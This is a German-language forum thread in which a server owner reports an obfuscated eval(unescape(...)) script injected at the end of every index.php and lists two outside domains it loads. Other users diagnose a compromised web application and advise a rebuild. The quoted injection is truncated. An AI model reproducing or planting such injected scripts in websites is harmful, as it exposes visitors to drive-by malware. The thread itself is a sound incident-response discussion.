Hallo
Ich habe heute festgestellt, dass auf allen Webseiten, die auf meinem Server mit opensuse 10.1, am Ende jeder index.php ein Kode eingefügt wird:
<!-- 1201194730 --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C......B"));
</script>
Außerdem werden im Hintergrund (sieht in Browser Statuszeile) zwei Webseiten aufgerufen:
ol1mpus.cn
duplishe.org/count=7
Ich habe schon chrootkit ausgeführt, aber es wurde nichts gefunden.
Kann mir jemand helfen? Ich brauche dringend hilfe.
Seltsames Script wird ausgeführt
-
Joe User
- Project Manager
- Posts: 11183
- Joined: 2003-02-27 01:00
- Location: Hamburg
Re: Seltsames Script wird ausgeführt
Kurzfassung: Eine Deiner WebApps wurde erfolgreich gecrackt und dann die Dateien manipuliert. Server ins Rescuesystem booten, Nutzdaten säubern und sichern, System reinitialisieren, Updates einspielen, System besser absichern und erst danach wieder online gehen.
PayPal.Me/JoeUser ● FreeBSD Remote Installation
Wings for Life ● Wings for Life World Run
„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
Wings for Life ● Wings for Life World Run
„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
-
Roger Wilco
- Posts: 5923
- Joined: 2004-05-23 12:53
Re: Seltsames Script wird ausgeführt
Hängt eventuell hiermit zusammen:
http://www.securityfocus.com/news/11501
http://www.secureworks.com/research/thr ... uxservers/
Wäre schön, wenn du eine Post Mortem Analyse machen könntest und das Ergebnis hier postest.
http://www.securityfocus.com/news/11501
http://www.secureworks.com/research/thr ... uxservers/
Wäre schön, wenn du eine Post Mortem Analyse machen könntest und das Ergebnis hier postest.